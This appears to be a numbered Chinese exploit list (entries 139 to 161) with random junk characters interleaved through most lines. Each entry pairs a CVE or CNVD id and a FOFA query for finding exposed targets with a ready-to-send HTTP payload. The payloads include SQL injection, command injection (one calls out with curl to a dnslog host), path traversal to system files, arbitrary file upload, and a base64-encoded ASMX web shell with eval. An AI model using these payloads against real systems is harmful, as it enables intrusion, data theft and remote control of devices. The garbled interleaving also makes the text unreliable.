6 Z" B" X8 o6 H2 bUpgrade-Insecure-Requests: 1
$ \: C j. o( L8 v3 i1 N1 H6 d, t2 O* x
u5 o2 q! A9 e# b5 ?; V8 k139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 `' c) }( J3 v! }8 I1 B4 g* O: K- V
CVE-2024-2622
: |& \ N; Z! Y/ ?! jFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 b9 {, t( A: f- ?; ]5 `9 v5 u
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
W! E3 V1 S) q- _3 V- j$ wHost: x.x.x.x
9 Z; E( ^6 L0 o% K: S* P% w$ ~7 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" D, M+ W2 ]$ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ?" }! n/ W' e' l# ?5 {$ \. G! _ hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( q! t2 V6 V" h, k
Accept-Encoding: gzip, deflate, br% F! V" F0 [* B& D9 {
Connection: close: V8 [% s0 a! n$ O; Q5 r
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk5 [. m5 j, a+ V/ F+ L
Upgrade-Insecure-Requests: 1
2 e7 B' v% U* \+ m1 t3 n( J* ?/ A& o
) ~7 O# ?. R7 ^) N$ f; e1 j; y6 d4 m5 `' P4 a
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
$ I1 q7 Q) H) oCVE-2024-2566
- R" S$ \! }6 s+ @* K# f$ LFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 b, t0 g5 p" _GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
. _' f2 O8 _7 b% P6 F" {0 b- Y! fHost: x.x.x.x
: A: R. w2 Z$ I! _1 F6 y/ y' `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% X0 j4 V( g+ k [( {" F% \+ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 E) ^, ^! J0 y, F5 h+ b( W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 t6 E( O; X V
Accept-Encoding: gzip, deflate, br' J1 r# L9 P* o6 m" h
Connection: close3 ~0 o& @, R2 D
Cookie: authcode=h8g9( b2 Y& f, |: m/ N4 U
Upgrade-Insecure-Requests: 17 ]! d [! L. j" s. y! ~
0 w% [) }/ j; s: A& z! e6 W; a( t* B' J$ z9 f; k( w/ j
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入3 x: F% _! B2 }$ }7 R' `& b9 g; o. d
FOFA:body="指挥调度管理平台"2 {6 r" p$ A) n' S2 ~; ~
POST /app/ext/ajax_users.php HTTP/1.1& a: a4 }% J3 B$ m# T2 n* c
Host: your-ip
( t! R3 @/ o: W2 M9 P: H+ }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, N3 y+ {" a0 m# s$ Z
Content-Type: application/x-www-form-urlencoded7 v2 H7 M- h( m% Y7 c
! I0 l+ w+ ~8 u/ D) ]/ s! x8 e ^5 T
- G. e' g5 q* K8 S1 B9 K3 |/ \
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -0 M6 x/ C- n7 [$ u; T4 Y9 j
8 Y) e; c, T% G9 X r1 B w4 f/ I% e: d$ D/ w1 l& s
142. CMSV6车辆监控平台系统中存在弱密码
! Q7 C S/ q% C- f8 j$ y% ECVE-2024-29666
K+ @! ]1 F6 i: KFOFA:body="/808gps/"2 ? E0 _8 y4 P5 F2 O) [6 x
admin/admin
. e6 X+ l1 U0 ]5 [4 }+ |& I# y6 }% T143. Netis WF2780 v2.1.40144 远程命令执行
2 a% E6 e2 N' \- l, ^7 DCVE-2024-25850
; U+ `: B) n* yFOFA:title='AP setup' && header='netis'% i0 L K8 q* R) N
PAYLOAD% D5 z1 C% M3 l$ s
. r$ Z4 ~8 U6 |; U" ] |+ O
144. D-Link nas_sharing.cgi 命令注入+ u6 \6 d, @0 \/ Q7 v$ E' o' V
FOFA:app="D_Link-DNS-ShareCenter"' N7 n% p/ O5 f, m+ ~: d
system参数用于传要执行的命令
; s$ L' A9 B/ m9 ]6 S; m1 K. CGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.13 e1 y% v4 c+ I k
Host: x.x.x.x9 |( M q0 D; @8 O- E
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.08 t0 Y4 l& d+ t2 B' F
Connection: close! q* |% R+ v/ f2 J9 R
Accept: */*- v6 K& M0 \! H3 t
Accept-Language: en: g0 e" R$ C0 m, x" g* d
Accept-Encoding: gzip
f) ~) h ~" o' r3 `' o- i& w+ u: ]# `# P" S) s; U- Q+ ^
. c E. I& |2 M" P/ h145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# Y3 c: b2 ]+ l/ H" H
CVE-2024-3400
+ a k0 P4 ^8 B7 b' L% x0 [FOFA:icon_hash="-631559155"
) b2 V: `+ c! m" M$ E- AGET /global-protect/login.esp HTTP/1.1
' z0 p, X( b; E2 G9 u: JHost: 192.168.30.112:10050 z7 x- k+ w5 @$ n( e+ J* A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. g& i8 ` A4 [$ O0 J5 K
Connection: close
/ ]! F2 l" }( k& KCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
$ g c; ]4 q5 g# TAccept-Encoding: gzip- i% Z9 T" d( J8 y, g1 b
- _# ^# M: t5 g( p# w9 Y% u' i
( D& U" ]4 ~" a
146. MajorDoMo thumb.php 未授权远程代码执行/ p- J$ |2 n! H7 y
CNVD-2024-021757 s3 G5 T3 ]' P# m4 n' ?) ?
FOFA:app="MajordomoSL"
7 m: `8 R! A6 Q7 T, c' RGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
. b3 i! r' E& E1 ]' e" hHost: x.x.x.x9 o' w" B) g$ V' i9 E# W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84) R$ L) w3 {# }: I# F
Accept-Charset: utf-8
' k+ {" O2 P6 J- W& \, \4 VAccept-Encoding: gzip, deflate: _4 U! x$ \. w" X
Connection: close9 J/ u3 v1 N$ F( u; e* L
8 h: f. V+ `9 D; J9 Z
% a6 c% s. W+ B: _$ A" t9 n; L
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历2 w. z( D; Z ]" }- O7 d
CVE-2024-32399
0 i+ c$ w7 a6 l! {3 A/ OFOFA:body="RaidenMAILD"
4 G3 t3 v; X- E) R, aGET /webeditor/../../../windows/win.ini HTTP/1.1$ W4 [1 h, o- X8 V: A, i) m5 B
Host: 127.0.0.1:81- |( c, K$ {0 ~# F" d5 C
Cache-Control: max-age=0
# ?' ? K& Q1 c$ z RConnection: close7 g9 N$ s0 t) q6 X' p) d \
+ R5 A6 R, t, j- ^8 M {; X. v7 M
: w1 \, W6 ^9 I% q& j148. CrushFTP 认证绕过模板注入
2 H: H1 z1 T, _0 M( d" R: UCVE-2024-4040' z9 u. a6 ~" I N
FOFA:body="CrushFTP"7 s" R3 x4 {) W! ?+ |2 i4 y
PAYLOAD, U; {- G6 S9 q1 N) B$ C) a5 g) C* y ?
5 p3 X! }- }* g1 Y4 W' i
149. AJ-Report开源数据大屏存在远程命令执行; U( N6 B6 s6 @0 N7 y+ u
FOFA:title="AJ-Report"4 a/ L7 w7 Y$ A3 I7 u1 A3 E- f5 d
4 f: h ^- E# E& @7 r2 q6 B8 tPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- w: A" _7 ?7 ]/ U) {1 QHost: x.x.x.x8 g+ ^- I3 l. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Z; J4 Z4 j' R/ O$ K2 i% W8 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 T Z! {% Y* }3 M& }% J" ?. rAccept-Encoding: gzip, deflate, br
" H. s. [( G' H# W9 G2 C+ wAccept-Language: zh-CN,zh;q=0.9
) Q& ?% B% q2 f8 d/ ]. kContent-Type: application/json;charset=UTF-8$ G4 I: H9 P- o n$ v9 N
Connection: close1 |. F/ O4 s% |: C+ A
& ?. N7 h- j! {0 } v0 ]{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}8 J9 [, u* o) @5 b
- T M' O$ M6 u6 u- ]: Z: @
150. AJ-Report 1.4.0 认证绕过与远程代码执行
+ ?6 }1 t! D7 L4 hFOFA:title="AJ-Report"
" E' ]6 `0 R9 w3 A, G B. W& o* P, Z% jPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% o1 b1 D7 c' ?1 n6 w2 h3 b# OHost: x.x.x.x! r; u& E( s6 w' ~( S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 L7 [- Q4 ?4 T; [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ Z, X5 X! p$ |$ v4 CAccept-Encoding: gzip, deflate, br
( \% T+ p0 k& L# i+ wAccept-Language: zh-CN,zh;q=0.9
' r9 q8 z+ }% |5 u+ ^' C$ A, vContent-Type: application/json;charset=UTF-80 s7 m0 | c b1 G
Connection: close
; V: Z; m5 ~2 n5 h9 E" K+ }Content-Length: 339
: S8 R) v5 m; q
2 k3 F/ S G1 y8 \{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 y/ ]% e* O* F7 F2 \* d" \
4 n- E6 M7 v) q, _) N' ]8 n8 w( U$ N; f7 g6 _6 T0 P
151. AJ-Report 1.4.1 pageList sql注入
) v1 z3 t/ F9 G, h* vFOFA:title="AJ-Report"" c) `/ `4 ^! G0 n% I
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.10 G4 u$ X7 c5 w5 M
Host: x.x.x.x
5 ?8 \. |0 R3 {* s! yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
p3 P4 n/ u7 g/ u! NConnection: close% z) z9 d! x5 T% y
Accept-Encoding: gzip
6 p: z9 x3 v d# ?& ^
" C2 f, |5 ?, n0 M$ [+ ? t c/ Y* S& Z: ^: L+ `! z" o( j7 r9 t# A$ _
152. Progress Kemp LoadMaster 远程命令执行5 z7 J) u' E9 F+ A( T/ p
CVE-2024-1212$ _1 k6 ?8 R/ M! h& d
LoadMaster <= 7.2.59.2 (GA)$ P7 r: E8 u* X
LoadMaster<=7.2.54.8 (LTSF)) x" I" L4 K0 A7 D
LoadMaster <= 7.2.48.10 (LTS)) I6 M, L' X3 W/ _
FOFA:body="LoadMaster"! a+ F& I: e7 b; K( R1 ~0 R
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 z& J/ f/ y' ZGET /access/set?param=enableapi&value=1 HTTP/1.1
, z( x9 G5 \3 P/ E& V! W# }) RHost: x.x.x.x _3 e( H7 W) v2 j) t3 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1" [( A6 k2 l& L
Connection: close. q8 y$ {/ r+ J/ G; w0 m! F
Accept: */*
5 O2 C3 D+ z& aAccept-Language: en
$ _% }+ h }& gAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
; F1 [ x+ z+ R9 L# F6 a: V7 h) @" vAccept-Encoding: gzip
. p8 i) h2 ? g* h( i- N7 B
4 N4 s' f$ u, A/ X i
3 o( U8 Y) a3 [5 w( R" z* ^153. gradio任意文件读取
0 P6 ~" i/ u) b4 C; P: HCVE-2024-1561FOFA:body="__gradio_mode__"3 s: W0 c: |7 h& N; T/ d
第一步,请求/config文件获取componets的id4 T! z: I" o. T( e' v! C
http://x.x.x.x/config7 F" R% V/ Y: l% @0 O5 }! L
* _4 s H* s( h% e! J% Y6 U" H; r( [* _4 o
第二步,将/etc/passwd的内容写入到一个临时文件
% B/ c' k6 }! L! H1 [& ]POST /component_server HTTP/1.1
: @8 V1 `- l& Z2 A" ` S6 t# {Host: x.x.x.x6 g& Z9 C6 R6 ?6 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
. t6 r; B+ z( I; ^' n# z! OConnection: close
1 J: [. q3 U* S$ |; y! rContent-Length: 1152 h5 t0 B& S/ d$ I1 E! ^4 k
Content-Type: application/json
$ L. [) g6 n# T6 D# i, PAccept-Encoding: gzip
) Q; s# W: W- |" `! n# ` d3 E+ [4 ?! {
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}, r" o7 t& D1 I) ^, x# o
6 G# Q" u6 u: Q- i$ g) e* v/ k
$ {. R% W3 N- d2 l+ m0 t, Z
第三步访问$ V/ P0 q# F0 X
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
3 n7 k' X. S& A3 `. b
+ J7 |! f4 G* i6 ?5 t8 w3 B1 ]: Q6 R1 h$ p: F
154. 天维尔消防救援作战调度平台 SQL注入
/ h6 f _) A" g$ R/ g# yCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"3 q% \8 h# [0 a- Q* L* A5 h3 P/ M
POST /twms-service-mfs/mfsNotice/page HTTP/1.10 A1 g5 G* a1 v1 t" D1 x4 h
Host: x.x.x.x- \1 [! W/ H1 d( h
Content-Length: 1060 e$ J' @4 } Q7 |) |
Cache-Control: max-age=0
& E+ _7 V- S$ ?6 n. g8 yUpgrade-Insecure-Requests: 1' N& B7 h3 M' y" }
Origin: http://x.x.x.x
8 U# M/ X( P: k8 ~% E" u1 s' EContent-Type: application/json1 u) w# x0 A6 l' [" ~5 o, n1 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36- U1 M8 f; V, L9 B( D4 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ \/ u p. u7 ^ r7 y; @Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page/ w! r4 X& q/ Q
Accept-Encoding: gzip, deflate
1 ~. c& _& q4 `2 ?Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7/ D' Z; E- \9 i0 u# }' P, f
Connection: close
7 I$ d! i9 O3 L" H# \+ v- F! E6 j- V3 e# S9 m. Q% ^; B2 ^9 s
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
* j- B0 D" N' W0 `
( W" y) ^& M! N! U' \# t5 _4 @' T3 f# l# y* s( f, ?, ~
155. 六零导航页 file.php 任意文件上传" y& h; s5 g# e3 p" j2 F
CVE-2024-34982
4 L8 U: y- }% E( Z l( I: M& a5 GFOFA:title=="上网导航 - LyLme Spage"1 n; Y8 W0 C2 |+ e/ C
POST /include/file.php HTTP/1.1
6 Y& [$ z4 t/ p0 P v4 e7 l! z1 {Host: x.x.x.x
7 B/ x- }0 S6 P5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
- G2 o8 q& n8 ?7 G3 E9 O& UConnection: close
; ^" n7 h1 X3 y" {7 {: I4 YContent-Length: 232
* }; o% S6 A0 v! b% a$ d+ V/ QAccept: application/json, text/javascript, */*; q=0.014 d+ D& L7 B7 x6 `, E+ i& K
Accept-Encoding: gzip, deflate, br4 m( z, k H) z) G5 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 V% s9 e; o4 \; g1 DContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f# E, A& ~. K P1 X
X-Requested-With: XMLHttpRequest: I L y7 g5 C6 r, n, d( B
1 o# O% d* i4 V
-----------------------------qttl7vemrsold314zg0f
; p+ s' Z& R7 b4 ]. NContent-Disposition: form-data; name="file"; filename="test.php"$ _) p9 Q4 g* u7 |
Content-Type: image/png8 S3 B r/ f( L
f- P5 @" i& q1 K" V' d
<?php phpinfo();unlink(__FILE__);?>
8 C* t& j0 Y) V! A0 ]5 ]1 k0 g-----------------------------qttl7vemrsold314zg0f--
' }9 C6 n) e9 q3 Q# C: O! h" T* r% h% Z2 X2 \0 ?' H
e, H8 s/ B7 ?( ]% q访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php: j8 i7 X8 ]' ?* b. u" ~$ v' ]3 s
; y: I. f2 N- M. M1 |/ j) G0 i156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 `6 C* O* j7 F9 PCVE-2024-37210 v+ O: A+ j+ P B8 W3 P& `3 M
FOFA:"Location: /login.rsp"6 K9 {9 {: m$ i- M: |2 c
·TBK DVR-41046 T( k2 {3 E3 z# e) I3 E' W# R
·TBK DVR-42169 r! Y& [9 R+ \7 G. A( \* O
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1") I: n: ?0 d b
( S- y" U& D% w
! S0 o. M* O# mPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.19 k5 w3 b) `, k# q5 n6 `# a
Host: x.x.x.x
1 ^* g9 Z% c5 WUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ e0 }7 n( y; X3 j
Connection: close9 L, Y1 \6 Q6 D) V
Content-Length: 0
: S3 D8 c' E E) \Cookie: uid=1
/ m* a+ d4 S% V* VAccept-Encoding: gzip9 y0 Q' E1 Q7 }# J. \- G
, a7 ~; _, |! H* d2 S( T! J" I
8 W' h4 X/ E; O: |2 r157. 美特CRM upload.jsp 任意文件上传
2 }6 q, y9 `* bCNVD-2023-06971) [* H. f* Q5 E; N
FOFA:body="/common/scripts/basic.js"
3 s2 c5 v7 h7 E! K; R8 kPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1 H* J3 d- ^* s& X7 B$ J" f
Host: x.x.x.x
t5 q, M5 ?" n& KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' x! F6 ]2 F9 l. h) ]8 h) p% Z
Content-Length: 709* p% V% B0 ]" d6 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ t C9 t/ ]7 k( i* L% a& q0 L
Accept-Encoding: gzip, deflate: Z5 P: \) `% `& u7 u- Y
Accept-Language: zh-CN,zh;q=0.9 A5 p' d3 }: m8 q5 G$ O
Cache-Control: max-age=04 C1 R' a% a1 L3 U- S+ Z/ s2 a
Connection: close
4 f+ a; n$ s* B" V2 AContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
4 L( ]+ m, ^1 P! U& c/ {+ QUpgrade-Insecure-Requests: 1 H7 b+ _6 ~ B. u& f
2 ~4 F0 f% Y2 y' V% u. A
------WebKitFormBoundary1imovELzPsfzp5dN
9 V8 u3 o: [8 }Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"( h3 d& l) V( P- |' M
Content-Type: application/octet-stream5 o& _( A9 e% d' I) M5 q4 S" d
V4 X& E. u" x; Y* Y% Dnyhelxrutzwhrsvsrafb% [2 B# L( x5 g4 |3 ]* [+ j
------WebKitFormBoundary1imovELzPsfzp5dN" M; _" ?+ s3 {5 v1 [# S
Content-Disposition: form-data; name="key"
& |# I+ }# g5 w4 l4 J6 _" }; M/ _( I
null6 S; _' w1 M! V0 E" u
------WebKitFormBoundary1imovELzPsfzp5dN; x. `% P2 X& u' M! {" p* H
Content-Disposition: form-data; name="form"4 @1 {! q _4 q2 l O `
/ }$ K6 I# h4 s8 G& S: o
null |; w% b5 D7 y. g' @- y
------WebKitFormBoundary1imovELzPsfzp5dN0 B+ g+ }; I/ K( G8 R# O( B6 l$ U
Content-Disposition: form-data; name="field"7 X8 p- a5 j7 [+ _( R9 t2 q9 j
% \7 ^. c6 n, i5 ?3 d$ z
null
4 B# w) e l3 ~------WebKitFormBoundary1imovELzPsfzp5dN
2 N; |5 L6 g, o0 G% A& E3 VContent-Disposition: form-data; name="filetitile", w+ \; l- Q& H: h& Q
; e0 q- I) w) X+ b/ f2 W2 D& n
null
. }' d7 U' m$ |+ o+ {3 z8 g0 A------WebKitFormBoundary1imovELzPsfzp5dN- m6 l+ S7 @- M( o; B" T
Content-Disposition: form-data; name="filefolder"
4 W( M% t- o1 Z' Y! j0 p' X& y' ^8 B& y# ]" r7 [* L) Z! _8 w
null D( {9 v, n7 k
------WebKitFormBoundary1imovELzPsfzp5dN--
6 X9 C/ x( J7 S8 o& K+ A* d& C0 o6 p7 E% K; ?
2 S) M& _1 j0 ^" ^% V
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
( v+ R& \2 j+ s; _/ c
, D0 ~. y+ `" R. r6 ~) v; p! I158. Mura-CMS-processAsyncObject存在SQL注入
* t, f4 l) X7 b: aCVE-2024-32640
, h, Q, T4 X, \, D" W' d4 lFOFA:"Generator: Masa CMS"
: V. G' g+ g- D1 Z$ d# L2 |3 e) BPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) h3 `; {; S4 k. U5 DHost: {{Hostname}}
) [4 s# @+ U2 N4 e; R/ m4 ZContent-Type: application/x-www-form-urlencoded1 e5 m4 y# j. I) `5 C! k- b& G3 S
! d. G5 D5 u5 p: J3 K! J7 X# T) o bobject=displayregion&contenthistid=x\'&previewid=1
& y- S h3 H& P0 g9 s: N, [4 @% X H1 l' \+ g
2 N8 F# Y; c. Q
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传1 [) G& x ^5 S% `/ e9 m" G
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
+ f/ _6 j: N, V' `$ s+ y6 [POST /webservices/WebJobUpload.asmx HTTP/1.15 P- _6 ?4 g$ z2 M3 t6 Y+ K; E
Host: x.x.x.x( X0 v1 k/ ?7 _- L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ H; D ^" c9 \6 R! [7 bContent-Length: 1080
" \9 y, ` w8 o* `Accept-Encoding: gzip, deflate" K# I& {4 g2 f6 P: {& a* V
Connection: close
( j2 B* D4 J8 hContent-Type: text/xml; charset=utf-8
' }6 `1 e0 g( B9 WSoapaction: "http://rainier/jobUpload"( ^6 a9 i8 I# d9 s
2 C( j# a ]$ z* h
<?xml version="1.0" encoding="utf-8"?>+ J8 X& e* X" K4 m, B
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* V3 o6 T& L1 f* L9 I! O! T# A9 Z<soap:Body>
: R0 ~- j% v; Z& y" u7 c<jobUpload xmlns="http://rainier">* W) ]& ]' K* v. f; U# b
<vcode>1</vcode>
# L0 T. S9 U# Q; G' `8 x<subFolder></subFolder>1 s& S, U. b- g: H; D- d" E% p
<fileName>abcrce.asmx</fileName>
4 ~/ Y" y/ h* T0 h8 }<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 R: D5 T- V7 U, v& p/ @</jobUpload>" u. v" H( ]9 B% v" l
</soap:Body>& _- J! H1 }" f" j
</soap:Envelope>) V4 A5 t3 c7 R9 M" ^+ d! q
; ]7 B; d4 C3 L$ u0 d) L
' R0 W, w! X) W; U' w9 m: D( L. O/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
: A; L7 w; z2 a" P0 c' Z5 M M5 i( }8 L( L8 m; |
3 D& Q' Y w" ?. U% p& i- a: h
160. Sonatype Nexus Repository 3目录遍历与文件读取2 O6 v& @4 _4 a$ f+ \2 h
CVE-2024-4956" a1 T6 c, Y! W; s8 p
FOFA:title="Nexus Repository Manager"
M9 \3 V: i u6 f: \GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1+ O! V% {+ k/ {1 F L7 d" f3 g
Host: x.x.x.x. T* R/ R1 F( H# w+ ?
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.07 H: g) f& P- P
Connection: close
5 W" |9 N, ^$ b) E. l/ d3 qAccept: */*" l$ K7 p1 l1 n7 g" c7 ~
Accept-Language: en( }5 N$ |" D6 I. q/ Y/ i% i
Accept-Encoding: gzip5 \& B }( T. g c q* |
+ S1 O% n0 D4 K2 n% b
3 ~9 E6 q, N) M161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
- i e: O, \: O, e+ X, JFOFA:body="/KT_Css/qd_defaul.css"+ R* ]/ G; G7 l" ]! P) S
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密& }* b* Z! q# R0 f+ f; P
POST /Webservice.asmx HTTP/1.1
8 t' V6 x/ W2 p1 `; p' T; v& KHost: x.x.x.x$ m! e& Q1 q( d" q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
4 C' y) m: m% t8 }Connection: close4 |, M5 O" m3 ~0 }
Content-Length: 445
2 G$ M( [" h1 u. U. JContent-Type: text/xml
) M7 J3 R9 b0 J7 o* R& IAccept-Encoding: gzip
% z! h" I9 U9 x: P4 l# J# W, I u: p5 w7 t3 ]) Y, i
<?xml version="1.0" encoding="utf-8"?>
